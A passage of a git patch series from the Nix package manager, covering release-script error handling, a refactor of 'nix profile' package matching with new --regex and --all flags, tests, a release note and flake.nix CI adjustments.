-my $nixRev = $flakeInfo->{revision} or die;
+my $flakeUrl = $evalInfo->{flake};
+my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die) if $flakeUrl;
+my $nixRev = ($flakeInfo ? $flakeInfo->{revision} : $evalInfo->{jobsetevalinputs}->{nix}->{revision}) or die;
 
 my $buildInfo = decode_json(fetch("$evalUrl/job/build.x86_64-linux", 'application/json'));
 #print Dumper($buildInfo);
@@ -83,12 +85,19 @@ my $channelsBucket = $s3_us->bucket($channelsBucketName) or die;
 sub getStorePath {
     my ($jobName, $output) = @_;
     my $buildInfo = decode_json(fetch("$evalUrl/job/$jobName", 'application/json'));
-    return $buildInfo->{buildoutputs}->{$output or "out"}->{path} or die "cannot get store path for '$jobName'";
+    return $buildInfo->{buildoutputs}->{$output or "out"}->{path} // die "cannot get store path for '$jobName'";
 }
 
 sub copyManual {
-    my $manual = getStorePath("build.x86_64-linux", "doc");
-    print "$manual\n";
+    my $manual;
+    eval {
+        $manual = getStorePath("build.x86_64-linux", "doc");
+    };
+    if ($@) {
+        warn "$@";
+        return;
+    }
+    print "Manual: $manual\n";
 
     my $manualNar = "$tmpDir/$releaseName-manual.nar.xz";
     print "$manualNar\n";
@@ -154,19 +163,33 @@ downloadFile("binaryTarball.x86_64-linux", "1");
 downloadFile("binaryTarball.aarch64-linux", "1");
 downloadFile("binaryTarball.x86_64-darwin", "1");
 downloadFile("binaryTarball.aarch64-darwin", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+eval {
+    downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
+eval {
+    downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
 downloadFile("installerScript", "1");
 
 # Upload docker images to dockerhub.
 my $dockerManifest = "";
 my $dockerManifestLatest = "";
+my $haveDocker = 0;
 
 for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
     my $system = $platforms->[0];
     my $dockerPlatform = $platforms->[1];
     my $fn = "nix-$version-docker-image-$dockerPlatform.tar.gz";
-    downloadFile("dockerImage.$system", "1", $fn);
+    eval {
+        downloadFile("dockerImage.$system", "1", $fn);
+    };
+    if ($@) {
+        warn "$@" if $@;
+        next;
+    }
+    $haveDocker = 1;
 
     print STDERR "loading docker image for $dockerPlatform...\n";
     system("docker load -i $tmpDir/$fn") == 0 or die;
@@ -194,21 +217,23 @@ for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
     $dockerManifestLatest .= " --amend $latestTag"
 }
 
-print STDERR "creating multi-platform docker manifest...\n";
-system("docker manifest rm nixos/nix:$version");
-system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
-if ($isLatest) {
-    print STDERR "creating latest multi-platform docker manifest...\n";
-    system("docker manifest rm nixos/nix:latest");
-    system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
-}
+if ($haveDocker) {
+    print STDERR "creating multi-platform docker manifest...\n";
+    system("docker manifest rm nixos/nix:$version");
+    system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
+    if ($isLatest) {
+        print STDERR "creating latest multi-platform docker manifest...\n";
+        system("docker manifest rm nixos/nix:latest");
+        system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
+    }
 
-print STDERR "pushing multi-platform docker manifest...\n";
-system("docker manifest push nixos/nix:$version") == 0 or die;
+    print STDERR "pushing multi-platform docker manifest...\n";
+    system("docker manifest push nixos/nix:$version") == 0 or die;
 
-if ($isLatest) {
-    print STDERR "pushing latest multi-platform docker manifest...\n";
-    system("docker manifest push nixos/nix:latest") == 0 or die;
+    if ($isLatest) {
+        print STDERR "pushing latest multi-platform docker manifest...\n";
+        system("docker manifest push nixos/nix:latest") == 0 or die;
+    }
 }
 
 # Upload nix-fallback-paths.nix.

From 4b4c71e2391802ed98e0274b631cba1a4cfa66f9 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 7 Mar 2024 08:15:25 -0800
Subject: [PATCH 586/654] Restore "checking Hydra job" message in `nix flake
 check`

Mistakenly removed in #8893, thanks @lf- for catching this!

https://github.com/NixOS/nix/commit/9404ce36e4edd1df12892089bdab1ceb7d4d7a97#r139485316
---
 src/nix/flake.cc | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 1822b990f..a846f6371 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -482,6 +482,8 @@ struct CmdFlakeCheck : FlakeCommand
 
         checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) {
             try {
+                Activity act(*logger, lvlInfo, actUnknown,
+                    fmt("checking Hydra job '%s'", attrPath));
                 state->forceAttrs(v, pos, "");
 
                 if (state->isDerivation(v))

From 741a6bfad53d1efbc34fb148c8ca4b9dc01691d4 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 22:27:16 +0100
Subject: [PATCH 587/654] profile: allow different types of matchers

---
 src/nix/profile.cc | 164 ++++++++++++++++++++++++---------------------
 1 file changed, 89 insertions(+), 75 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index fc669d5ed..41dcccc50 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -453,55 +453,86 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
     }
 };
 
-class MixProfileElementMatchers : virtual Args
+enum MatcherType
 {
-    std::vector _matchers;
+    Regex,
+    StorePath,
+};
+
+struct Matcher
+{
+    MatcherType type;
+    std::string title;
+    std::function matches;
+};
+
+Matcher createRegexMatcher(const std::string & pattern)
+{
+    std::regex reg(pattern, std::regex::extended | std::regex::icase);
+    return {
+        .type = MatcherType::Regex,
+        .title = fmt("Regex '%s'", pattern),
+        .matches = [reg](const std::string &name, const ProfileElement & element) {
+            return std::regex_match(element.identifier(), reg);
+        },
+    };
+}
+
+Matcher createStorePathMatcher(const nix::StorePath & storePath)
+{
+    return {
+        .type = MatcherType::StorePath,
+        .title = fmt("Store path '%s'", storePath.to_string()),
+        .matches = [storePath](const std::string &name, const ProfileElement & element) {
+            return element.storePaths.count(storePath);
+        }
+    };
+}
+
+class MixProfileElementMatchers : virtual Args, virtual StoreCommand
+{
+    std::vector _matchers;
 
 public:
 
     MixProfileElementMatchers()
     {
-        expectArgs("elements", &_matchers);
+        expectArgs(ExpectedArg {
+            .label = "elements",
+            .optional = true,
+            .handler = {[this](std::vector args) {
+                for (auto & arg : args) {
+                    if (auto n = string2Int(arg)) {
+                        throw Error("'nix profile' no longer supports indices ('%d')", *n);
+                    } else if (getStore()->isStorePath(arg)) {
+                        _matchers.push_back(createStorePathMatcher(getStore()->parseStorePath(arg)));
+                    } else {
+                        _matchers.push_back(createRegexMatcher(arg));
+                    }
+                }
+            }}
+        });
     }
 
-    struct RegexPattern {
-        std::string pattern;
-        std::regex  reg;
-    };
-    typedef std::variant Matcher;
-
-    std::vector getMatchers(ref store)
-    {
-        std::vector res;
-
-        for (auto & s : _matchers) {
-            if (auto n = string2Int(s))
-                throw Error("'nix profile' no longer supports indices ('%d')", *n);
-            else if (store->isStorePath(s))
-                res.push_back(s);
-            else
-                res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)});
+    std::set getMatchingElementNames(ProfileManifest & manifest) {
+        if (_matchers.empty()) {
+            throw UsageError("No packages specified.");
         }
 
-        return res;
-    }
-
-    bool matches(
-        const Store & store,
-        const std::string & name,
-        const ProfileElement & element,
-        const std::vector & matchers)
-    {
-        for (auto & matcher : matchers) {
-            if (auto path = std::get_if(&matcher)) {
-                if (element.storePaths.count(store.parseStorePath(*path))) return true;
-            } else if (auto regex = std::get_if(&matcher)) {
-                if (std::regex_match(name, regex->reg))
-                    return true;
+        std::set result;
+        for (auto & matcher : _matchers) {
+            bool foundMatch = false;
+            for (auto & [name, element] : manifest.elements) {
+                if (matcher.matches(name, element)) {
+                    result.insert(name);
+                    foundMatch = true;
+                }
+            }
+            if (!foundMatch) {
+                warn("%s does not match any packages in the profile.", matcher.title);
             }
         }
-
-        return false;
+        return result;
     }
 };
 
@@ -523,16 +554,19 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
     {
         ProfileManifest oldManifest(*getEvalState(), *profile);
 
-        auto matchers = getMatchers(store);
+        ProfileManifest newManifest = oldManifest;
 
-        ProfileManifest newManifest;
+        auto matchingElementNames = getMatchingElementNames(oldManifest);
 
-        for (auto & [name, element] : oldManifest.elements) {
-            if (!matches(*store, name, element, matchers)) {
-                newManifest.elements.insert_or_assign(name, std::move(element));
-            } else {
-                notice("removing '%s'", element.identifier());
-            }
+        if (matchingElementNames.empty()) {
+            warn ("No packages to remove. Use 'nix profile list' to see the current profile.");
+            return;
+        }
+
+        for (auto & name : matchingElementNames) {
+            auto & element = oldManifest.elements[name];
+            notice("removing '%s'", element.identifier());
+            newManifest.elements.erase(name);
         }
 
         auto removedCount = oldManifest.elements.size() - newManifest.elements.size();
@@ -540,16 +574,6 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
             removedCount,
             newManifest.elements.size());
 
-        if (removedCount == 0) {
-            for (auto matcher: matchers) {
-                if (const Path * path = std::get_if(&matcher)) {
-                    warn("'%s' does not match any paths", *path);
-                } else if (const RegexPattern * regex = std::get_if(&matcher)) {
-                    warn("'%s' does not match any packages", regex->pattern);
-                }
-            }
-            warn ("Use 'nix profile list' to see the current profile.");
-        }
         updateProfile(newManifest.build(store));
     }
 };
@@ -572,20 +596,20 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
     {
         ProfileManifest manifest(*getEvalState(), *profile);
 
-        auto matchers = getMatchers(store);
-
         Installables installables;
         std::vector elems;
 
-        auto matchedCount = 0;
         auto upgradedCount = 0;
 
-        for (auto & [name, element] : manifest.elements) {
-            if (!matches(*store, name, element, matchers)) {
-                continue;
-            }
+        auto matchingElementNames = getMatchingElementNames(manifest);
 
-            matchedCount++;
+        if (matchingElementNames.empty()) {
+            warn("No packages to upgrade. Use 'nix profile list' to see the current profile.");
+            return;
+        }
+
+        for (auto & name : matchingElementNames) {
+            auto & element = manifest.elements[name];
 
             if (!element.source) {
                 warn(
@@ -641,18 +665,8 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
         }
 
         if (upgradedCount == 0) {
-            if (matchedCount == 0) {
-                for (auto & matcher : matchers) {
-                    if (const Path * path = std::get_if(&matcher)) {
-                        warn("'%s' does not match any paths", *path);
-                    } else if (const RegexPattern * regex = std::get_if(&matcher)) {
-                        warn("'%s' does not match any packages", regex->pattern);
-                    }
-                }
-            } else {
-                warn("Found some packages but none of them could be upgraded.");
-            }
-            warn ("Use 'nix profile list' to see the current profile.");
+            warn("Found some packages but none of them could be upgraded.");
+            return;
         }
 
         auto builtPaths = builtPathsPerInstallable(

From d6f5da51d3ae11c6771c68ebb65e7a560af167b5 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 22:33:37 +0100
Subject: [PATCH 588/654] profile: match on package name instead of regex

---
 src/nix/profile.cc | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index 41dcccc50..d79f1158b 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -457,6 +457,7 @@ enum MatcherType
 {
     Regex,
     StorePath,
+    Name,
 };
 
 struct Matcher
@@ -489,6 +490,16 @@ Matcher createStorePathMatcher(const nix::StorePath & storePath)
     };
 }
 
+Matcher createNameMatcher(const std::string & name) {
+    return {
+        .type = MatcherType::Name,
+        .title = fmt("Package name '%s'", name),
+        .matches = [name](const std::string &elementName, const ProfileElement & element) {
+            return elementName == name;
+        }
+    };
+}
+
 class MixProfileElementMatchers : virtual Args, virtual StoreCommand
 {
     std::vector _matchers;
@@ -507,7 +518,7 @@ public:
                     } else if (getStore()->isStorePath(arg)) {
                         _matchers.push_back(createStorePathMatcher(getStore()->parseStorePath(arg)));
                     } else {
-                        _matchers.push_back(createRegexMatcher(arg));
+                        _matchers.push_back(createNameMatcher(arg));
                     }
                 }
             }}

From 87741dbd2118b0c90db6a37525b36c7bc93617ce Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Thu, 7 Mar 2024 20:33:59 +0100
Subject: [PATCH 589/654] profile: add --regex option to match packages

---
 src/nix/profile-remove.md       |  2 +-
 src/nix/profile-upgrade.md      |  2 +-
 src/nix/profile.cc              | 10 +++++++++-
 tests/functional/nix-profile.sh | 10 ++++++++++
 4 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md
index 1f6532250..e2dea3389 100644
--- a/src/nix/profile-remove.md
+++ b/src/nix/profile-remove.md
@@ -11,7 +11,7 @@ R""(
 * Remove all packages:
 
   ```console
-  # nix profile remove '.*'
+  # nix profile remove --regex '.*'
   ```
 
 * Remove a package by store path:
diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md
index 432b8fa94..e04ad109e 100644
--- a/src/nix/profile-upgrade.md
+++ b/src/nix/profile-upgrade.md
@@ -6,7 +6,7 @@ R""(
   reference:
 
   ```console
-  # nix profile upgrade '.*'
+  # nix profile upgrade --regex '.*'
   ```
 
 * Upgrade a specific package by name:
diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d79f1158b..c08d02e70 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -508,7 +508,15 @@ public:
 
     MixProfileElementMatchers()
     {
-        expectArgs(ExpectedArg {
+        addFlag({
+            .longName = "regex",
+            .description = "A regular expression to match one or more packages in the profile.",
+            .labels = {"pattern"},
+            .handler = {[this](std::string arg) {
+                _matchers.push_back(createRegexMatcher(arg));
+            }},
+        });
+        expectArgs({
             .label = "elements",
             .optional = true,
             .handler = {[this](std::vector args) {
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 88b713d53..274b72de2 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -71,6 +71,16 @@ nix profile upgrade flake1
 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello NixOS" ]]
 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 2.0, 2.0-man"
 
+# Test upgrading package using regular expression.
+printf 2.1 > $flake1Dir/version
+nix profile upgrade --regex '.*'
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
+nix profile rollback
+
+# Test removing all packages using regular expression.
+nix profile remove --regex '.*' 2>&1 | grep "removed 2 packages, kept 0 packages"
+nix profile rollback
+
 # Test 'history', 'diff-closures'.
 nix profile diff-closures
 

From 9fac62435c5f05783456512b09e3f207a9d62004 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 23:35:10 +0100
Subject: [PATCH 590/654] tests/functional: add assertStderr function

Currently there isn't a convenient way to check for multiline output. In
addition, these outputs will easily change and having a diff between the
expected and the actual output upon failures is convenient.
---
 tests/functional/common/vars-and-functions.sh.in | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in
index 8fef29f97..3975986c0 100644
--- a/tests/functional/common/vars-and-functions.sh.in
+++ b/tests/functional/common/vars-and-functions.sh.in
@@ -216,6 +216,17 @@ expectStderr() {
     return 0
 }
 
+# Run a command and check whether the stderr matches stdin.
+# Show a diff when output does not match.
+# Usage:
+#
+#   assertStderr nix profile remove nothing << EOF
+#   error: This error is expected
+#   EOF
+assertStderr() {
+    diff -u /dev/stdin <($@ 2>/dev/null 2>&1)
+}
+
 needLocalStore() {
   if [[ "$NIX_REMOTE" == "daemon" ]]; then
     skipTest "Can’t run through the daemon ($1)"

From fb391ebc77cc02d74eae4b4826137ed0d79b0455 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 23:39:45 +0100
Subject: [PATCH 591/654] profile: add tests for not matching any packages

---
 tests/functional/nix-profile.sh | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 274b72de2..67c8bcc98 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -77,6 +77,18 @@ nix profile upgrade --regex '.*'
 [[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
 nix profile rollback
 
+# Test matching no packages using literal package name.
+assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
+warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
+# Test matching no packages using regular expression.
+assertStderr nix --offline profile upgrade --regex '.*unknown_package.*' << EOF
+warning: Regex '.*unknown_package.*' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
 # Test removing all packages using regular expression.
 nix profile remove --regex '.*' 2>&1 | grep "removed 2 packages, kept 0 packages"
 nix profile rollback
@@ -85,6 +97,10 @@ nix profile rollback
 nix profile diff-closures
 
 # Test rollback.
+printf World > $flake1Dir/who
+nix profile upgrade flake1
+printf NixOS > $flake1Dir/who
+nix profile upgrade flake1
 nix profile rollback
 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]]
 

From 7a4d5e89d33de9d2c656a3d5b4fd44d9cf2cb05d Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 6 Mar 2024 22:04:53 +0100
Subject: [PATCH 592/654] profile: add --all option to match any package

---
 src/nix/profile-remove.md       |  9 ++++++++-
 src/nix/profile-upgrade.md      |  8 +++++++-
 src/nix/profile.cc              | 16 ++++++++++++++++
 tests/functional/nix-profile.sh |  7 +++++++
 4 files changed, 38 insertions(+), 2 deletions(-)

diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md
index e2dea3389..e7e5e0dfb 100644
--- a/src/nix/profile-remove.md
+++ b/src/nix/profile-remove.md
@@ -11,9 +11,16 @@ R""(
 * Remove all packages:
 
   ```console
-  # nix profile remove --regex '.*'
+  # nix profile remove --all
   ```
 
+* Remove packages by regular expression:
+
+  ```console
+  # nix profile remove --regex '.*vim.*'
+  ```
+
+
 * Remove a package by store path:
 
   ```console
diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md
index e04ad109e..da7a668db 100644
--- a/src/nix/profile-upgrade.md
+++ b/src/nix/profile-upgrade.md
@@ -6,7 +6,7 @@ R""(
   reference:
 
   ```console
-  # nix profile upgrade --regex '.*'
+  # nix profile upgrade --all
   ```
 
 * Upgrade a specific package by name:
@@ -15,6 +15,12 @@ R""(
   # nix profile upgrade hello
   ```
 
+* Upgrade all packages that include 'vim' in their name:
+
+  ```console
+  # nix profile upgrade --regex '.*vim.*'
+  ```
+
 # Description
 
 This command upgrades a previously installed package in a Nix profile,
diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index c08d02e70..701c5cb29 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -458,6 +458,7 @@ enum MatcherType
     Regex,
     StorePath,
     Name,
+    All,
 };
 
 struct Matcher
@@ -500,6 +501,14 @@ Matcher createNameMatcher(const std::string & name) {
     };
 }
 
+Matcher all = {
+    .type = MatcherType::All,
+    .title = "--all",
+    .matches = [](const std::string &name, const ProfileElement & element) {
+        return true;
+    }
+};
+
 class MixProfileElementMatchers : virtual Args, virtual StoreCommand
 {
     std::vector _matchers;
@@ -508,6 +517,13 @@ public:
 
     MixProfileElementMatchers()
     {
+        addFlag({
+            .longName = "all",
+            .description = "Match all packages in the profile.",
+            .handler = {[this]() {
+                _matchers.push_back(all);
+            }},
+        });
         addFlag({
             .longName = "regex",
             .description = "A regular expression to match one or more packages in the profile.",
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 67c8bcc98..b8513ac02 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -77,6 +77,13 @@ nix profile upgrade --regex '.*'
 [[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
 nix profile rollback
 
+# Test upgrading all packages
+printf 2.2 > $flake1Dir/version
+nix profile upgrade --all
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.2/bin/hello ]]
+nix profile rollback
+printf 1.0 > $flake1Dir/version
+
 # Test matching no packages using literal package name.
 assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
 warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.

From 91f068c19309091b85f18fb5fc10ab3644642d50 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 6 Mar 2024 22:46:47 +0100
Subject: [PATCH 593/654] profile: make --all exclusive

---
 src/nix/profile.cc              | 9 +++++++++
 tests/functional/nix-profile.sh | 6 ++++++
 2 files changed, 15 insertions(+)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index 701c5cb29..d9455b4ee 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -554,6 +554,15 @@ public:
             throw UsageError("No packages specified.");
         }
 
+        if (std::find_if(_matchers.begin(), _matchers.end(), [](const Matcher & m) { return m.type == MatcherType::All; }) != _matchers.end() && _matchers.size() > 1) {
+            throw UsageError("--all cannot be used with package names or regular expressions.");
+        }
+
+        if (manifest.elements.empty()) {
+            warn("There are no packages in the profile.");
+            return {};
+        }
+
         std::set result;
         for (auto & matcher : _matchers) {
             bool foundMatch = false;
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index b8513ac02..58fdce411 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -84,6 +84,12 @@ nix profile upgrade --all
 nix profile rollback
 printf 1.0 > $flake1Dir/version
 
+# Test --all exclusivity.
+assertStderr nix --offline profile upgrade --all foo << EOF
+error: --all cannot be used with package names or regular expressions.
+Try 'nix --help' for more information.
+EOF
+
 # Test matching no packages using literal package name.
 assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
 warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.

From 4741d3e308a716e5637af357237e1f44c7d598b6 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Thu, 7 Mar 2024 00:21:40 +0100
Subject: [PATCH 594/654] add release note

---
 doc/manual/rl-next/profile-regex-all.md | 35 +++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 doc/manual/rl-next/profile-regex-all.md

diff --git a/doc/manual/rl-next/profile-regex-all.md b/doc/manual/rl-next/profile-regex-all.md
new file mode 100644
index 000000000..e3e6849cc
--- /dev/null
+++ b/doc/manual/rl-next/profile-regex-all.md
@@ -0,0 +1,35 @@
+---
+synopsis: Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade`
+prs: 10166
+---
+
+Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
+For instance:
+
+```
+nix profile remove '.*vim.*'
+```
+
+This would remove all packages that contain `vim` in their name.
+
+In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes led to unintended behavior. For instance, `python3.1` could match `python311`.
+
+To avoid unintended behavior, the arguments are now only matching exact names.
+
+Matching using regular expressions is still possible by using the new `--regex` flag:
+
+```
+nix profile remove --regex '.*vim.*'
+```
+
+One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
+
+```
+nix profile upgrade '.*'
+```
+
+With the introduction of the `--all` flag, this now becomes more straightforward:
+
+```
+nix profile upgrade --all
+```

From 4354b37fc4d83002027af80cce037e2ee89f552c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 8 Mar 2024 08:48:53 +0100
Subject: [PATCH 595/654] Add more logs to the evalNixpkgs test

Make it possible to understand, at a minimum, what's going on in case of a
failure
---
 flake.nix | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/flake.nix b/flake.nix
index 42aaace67..80a55d40d 100644
--- a/flake.nix
+++ b/flake.nix
@@ -299,8 +299,11 @@
               ''
                 type -p nix-env
                 # Note: we're filtering out nixos-install-tools because https://github.com/NixOS/nixpkgs/pull/153594#issuecomment-1020530593.
-                time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
-                [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+                (
+                  set -x
+                  time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
+                  [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+                )
                 mkdir $out
               '';
 

From 201369dceb49da19af42e29b1dc11586da4a26e3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 8 Mar 2024 08:50:27 +0100
Subject: [PATCH 596/654] tests.evalNixpkgs: Update the golden hash

`nix-env -qaP`'s output has changed a bit because of https://github.com/NixOS/nix/issues/10132.

Although that's a bit annoying, it isn't nearly as problematic as the
evaluation changes that this test is supposed to catch. So it's fine to
just update the hash for the time being and fix the issue later
(properly fixing the issue will very likely change the hash anyway).
---
 flake.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 80a55d40d..e9d8395ec 100644
--- a/flake.nix
+++ b/flake.nix
@@ -302,7 +302,7 @@
                 (
                   set -x
                   time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
-                  [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+                  [[ $(sha1sum < packages | cut -c1-40) = e01b031fc9785a572a38be6bc473957e3b6faad7 ]]
                 )
                 mkdir $out
               '';

From 520a1df208e8292ce0dcb8cb12f454413ff88b0e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 10:40:53 +0100
Subject: [PATCH 597/654] flake: Disable the perl bindings on i686-linux

Some perl dependencies are failing: https://hydra.nixos.org/build/252347639/nixlog/1

Since the support is only best-effort there, disable the perl bindings
---
 flake.nix | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 42aaace67..15100f772 100644
--- a/flake.nix
+++ b/flake.nix
@@ -341,7 +341,6 @@
 
       checks = forAllSystems (system: {
         binaryTarball = self.hydraJobs.binaryTarball.${system};
-        perlBindings = self.hydraJobs.perlBindings.${system};
         installTests = self.hydraJobs.installTests.${system};
         nixpkgsLibTests = self.hydraJobs.tests.nixpkgsLibTests.${system};
         rl-next =
@@ -351,6 +350,11 @@
         '';
       } // (lib.optionalAttrs (builtins.elem system linux64BitSystems)) {
         dockerImage = self.hydraJobs.dockerImage.${system};
+      } // (lib.optionalAttrs (!(builtins.elem system linux32BitSystems))) {
+        # Some perl dependencies are broken on i686-linux.
+        # Since the support is only best-effort there, disable the perl
+        # bindings
+        perlBindings = self.hydraJobs.perlBindings.${system};
       });
 
       packages = forAllSystems (system: rec {

From ff74c081e9996756107a7a6a718376acac1aaa17 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 10:31:51 +0100
Subject: [PATCH 598/654] flake: Remove the cross-compilation to freebsd13

`libc` is broken there: https://hydra.nixos.org/build/252347598.

We can reintroduce it once the base system is working
---
 flake.nix | 1 -
 1 file changed, 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 42aaace67..49474b27e 100644
--- a/flake.nix
+++ b/flake.nix
@@ -31,7 +31,6 @@
       crossSystems = [
         "armv6l-unknown-linux-gnueabihf"
         "armv7l-unknown-linux-gnueabihf"
-        "x86_64-unknown-freebsd13"
         "x86_64-unknown-netbsd"
       ];
 

From 3d628d17041bbaab745dd04bedb2cea21c1f11a5 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Thu, 7 Mar 2024 21:40:18 +0100
Subject: [PATCH 599/654] profile: convert Matcher to abstract class

---
 src/nix/profile.cc | 122 ++++++++++++++++++++++++++-------------------
 1 file changed, 71 insertions(+), 51 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d9455b4ee..75f22934f 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -453,65 +453,85 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
     }
 };
 
-enum MatcherType
-{
-    Regex,
-    StorePath,
-    Name,
-    All,
-};
-
 struct Matcher
 {
-    MatcherType type;
-    std::string title;
-    std::function matches;
+    virtual std::string getTitle() = 0;
+    virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
 };
 
-Matcher createRegexMatcher(const std::string & pattern)
+struct RegexMatcher : public Matcher
 {
-    std::regex reg(pattern, std::regex::extended | std::regex::icase);
-    return {
-        .type = MatcherType::Regex,
-        .title = fmt("Regex '%s'", pattern),
